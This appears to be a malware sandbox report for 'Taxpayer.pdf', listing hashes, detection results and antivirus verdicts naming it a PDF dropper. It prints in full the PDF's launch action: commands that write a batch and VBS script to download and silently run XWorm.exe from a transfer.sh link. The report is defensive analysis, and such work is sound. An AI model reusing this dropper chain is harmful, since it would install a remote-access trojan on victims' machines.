Summary | ZeroBOX

Taxpayer.pdf

PDF
Category FILE
Machine s1_win7_x6401
Started March 29, 2023, 1:37 p.m.
Completed March 29, 2023, 1:37 p.m.
Size 1.3MB
Type PDF document, version 1.1
MD5 af333833c285ea114b841c4e8cde282f
SHA256 a2eaa11711925c2b1271b075bf2ece01de229f5e0ae0d69120ef9a35768b5257
CRC32 5B3D6C0E
ssdeep 24:WbKZ7YNqwTw+Bwky3lD6E5wkMMJIWgIXG2CSYapAakwOerXQr/3SlJiNno2fuxk2:tYAwTwowkyV1wkMYXG2lNkmXQbOiN0J
Yara
  • PDF_Format_Z - PDF Format

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Open action << /S /Launch /Win << /F CMD /P /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('https://transfer.sh/get/1MeR2u/XWorm.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click >> >>
MicroWorld-eScan Heur.BZC.HEV.Pantera.53.CE4B189C
FireEye Heur.BZC.HEV.Pantera.53.CE4B189C
Sangfor Exploit.Generic-Script.Save.0a46cc5b
Arcabit Exploit.PDF-Dropper.Gen
BitDefender Heur.BZC.HEV.Pantera.53.CE4B189C
VIPRE Heur.BZC.HEV.Pantera.53.CE4B189C
TrendMicro HEUR_PDFEXP.D
McAfee-GW-Edition BehavesLike.PDF.Trojan.tx
Emsisoft Exploit.PDF-Dropper.Gen (B)
GData Exploit.PDF-Dropper.Gen
ALYac Exploit.PDF-Dropper.Gen
MAX malware (ai score=85)
Fortinet VBS/Pantera.6A942003!tr